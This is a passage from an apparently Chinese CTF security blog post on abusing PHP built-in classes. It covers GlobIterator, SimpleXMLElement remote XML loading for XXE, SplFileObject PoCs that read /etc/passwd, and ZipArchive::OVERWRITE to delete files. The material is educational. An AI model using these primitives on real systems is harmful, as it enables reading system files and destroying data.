class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">__construct</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$path</span> , <span class="hljs-keyword">int</span> <span class="hljs-variable">$flags</span> = <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">KEY_AS_PATHNAME</span> | <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">CURRENT_AS_FILEINFO</span> | <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">SKIP_DOTS</span> )<br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">current</span> ( ) : <span class="hljs-keyword">mixed</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">getFlags</span> ( ) : <span class="hljs-keyword">int</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">key</span> ( ) : <span class="hljs-keyword">string</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">next</span> ( ) : <span class="hljs-keyword">void</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">rewind</span> ( ) : <span class="hljs-keyword">void</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-title class_">FilesystemIterator</span>::<span class="hljs-variable constant_">setFlags</span> ( <span class="hljs-keyword">int</span> <span class="hljs-variable">$flags</span> = ? ) : <span class="hljs-keyword">void</span><br>&#125;<br></code></pre></td></tr></table></figure>

<p>当我们知道flag文件在根目录，但是不知道flag文件的完整名，可以使用Globlterator(&#x2F;<em>flag</em>&#x2F;)</p>
<p><img src="/../images/20210809203839.png" srcset="/img/loading.gif" lazyload alt="image-20210809203750996"></p>
<h1 id="SimpleXMLElement"><a href="#SimpleXMLElement" class="headerlink" title="SimpleXMLElement"></a>SimpleXMLElement</h1><p>用于解析XML文档中的元素</p>
<p>官方文档对SimpleXMLElement类构造方法SimpleXMLElement::__construct定义：</p>
<p><img src="/../images/image-20231215162830705.png" srcset="/img/loading.gif" lazyload alt="image-20231215162830705"></p>
<p><img src="/../images/image-20231215162844688.png" srcset="/img/loading.gif" lazyload alt="image-20231215162844688"></p>
<p>可以看到第三个参数data_is_url为true，我们可以实现远程xml文件的载入</p>
<p>第二个参数的常量值我们设置为2即可</p>
<p>第一个参数data就是我们自己设置的payload的url地址，用于引入外部实体的url</p>
<h1 id="SplFileInfo"><a href="#SplFileInfo" class="headerlink" title="SplFileInfo"></a>SplFileInfo</h1><ul>
<li>PHP5,7,8</li>
</ul>
<p>SplFileInfo类为单个文件的信息提供了高级的面向对象接口</p>
<p>SplFileInfo::__toString  将文件路径作为字符串返回</p>
<p>PoC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$context</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">SplFileObject</span>(<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>);<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$context</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>)&#123;<br>    <span class="hljs-keyword">echo</span>(<span class="hljs-variable">$f</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<h1 id="SplFileObject"><a href="#SplFileObject" class="headerlink" title="SplFileObject"></a>SplFileObject</h1><p>SplFileObject类为单个文件的信息提供了一个高级的面向对象的接口，可以用于对文件内容的遍历、查找、操作等</p>
<p>该类的构造方法可以构造一个新的文件对象用于后续的读取</p>
<p>PoC</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$context</span> = <span class="hljs-keyword">new</span> <span class="hljs-built_in">SplFileObject</span>(<span class="hljs-string">&#x27;/etc/passwd&#x27;</span>);<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$context</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$f</span>)&#123;<br>    <span class="hljs-keyword">echo</span>(<span class="hljs-variable">$f</span>);<br>&#125;<br></code></pre></td></tr></table></figure>



<h1 id="ZipArchive"><a href="#ZipArchive" class="headerlink" title="ZipArchive"></a>ZipArchive</h1><ul>
<li>PHP&gt;5</li>
</ul>
<p>可以对文件进行压缩与解压缩</p>
<ul>
<li><code>ZipArchive::addEmptyDir</code>：添加一个新的文件目录</li>
<li><code>ZipArchive::addFile</code>：将文件添加到指定zip压缩包中</li>
<li><code>ZipArchive::addFromString</code>：添加新的文件同时将内容添加进去</li>
<li><code>ZipArchive::close</code>：关闭ziparchive</li>
<li><code>ZipArchive::extractTo</code>：将压缩包解压</li>
<li><code>ZipArchive::open</code>：打开一个zip压缩包</li>
<li><code>ZipArchive::deleteIndex</code>：删除压缩包中的某一个文件，如：<code>deleteIndex(0)</code>代表删除第一个文件</li>
<li><code>ZipArchive::deleteName</code>：删除压缩包中的某一个文件名称，同时也将文件删除</li>
</ul>
<p>来看看ZipArchive::open方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title class_">ZipArchive</span>::<span class="hljs-variable constant_">open</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$filename</span> [, <span class="hljs-keyword">int</span> <span class="hljs-variable">$flags</span> ] ) : <span class="hljs-keyword">mixed</span><br></code></pre></td></tr></table></figure>

<p>该方法用来打开一个新的或现有的zip存档进行读取、写入、修改</p>
<ul>
<li><code>$filename</code>：要打开的ZIP存档的文件名。</li>
<li><code>$flags</code>：用于打开档案的模式。有以下几种模式：</li>
<li><code>ZipArchive::OVERWRITE</code>：总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖或删除。</li>
<li><code>ZipArchive::CREATE</code>：如果不存在则创建一个zip压缩包。</li>
<li><code>ZipArchive::RDONLY</code>：只读模式打开压缩包。</li>
<li><code>ZipArchive::EXCL</code>：如果压缩包已经存在，则出错。</li>
<li><code>ZipArchive::CHECKCONS</code>：对压缩包执行额外的一致性检查，如果失败则显示错误。</li>
</ul>
<p>如果设置flags值为ZipArchive::OVERWRITE的话，可以删除指定文件</p>
<figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-variable">$a</span> = new Zip<span class="hljs-params">Archive</span>()<span class="hljs-comment">;</span><br><span class="hljs-variable">$a</span>-&gt;<span class="hljs-literal">open</span>(<span class="hljs-string">&#x27;1.txt&#x27;</span>,<span class="hljs-title function_">ZipArchive::OVERWRITE</span>)<span class="hljs-comment">;  </span><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/php/" class="print-no-link">#php</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>php原生类</div>
      <div>http://example.com/2023/12/15/php原生类/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>p0l1</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>December 15, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/12/15/%E7%90%A2%E5%85%89%E6%9D%AF%E6%96%B0%E7%94%9F%E8%B5%9Bwp-web/" title="琢光杯新生赛wp(web)">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">琢光杯新生赛wp(web)</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/12/11/BUUCTF%E5%88%B7%E9%A2%98/" title="BUUCTF刷题">
                        <span class="hidden-mobile">BUUCTF刷题</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
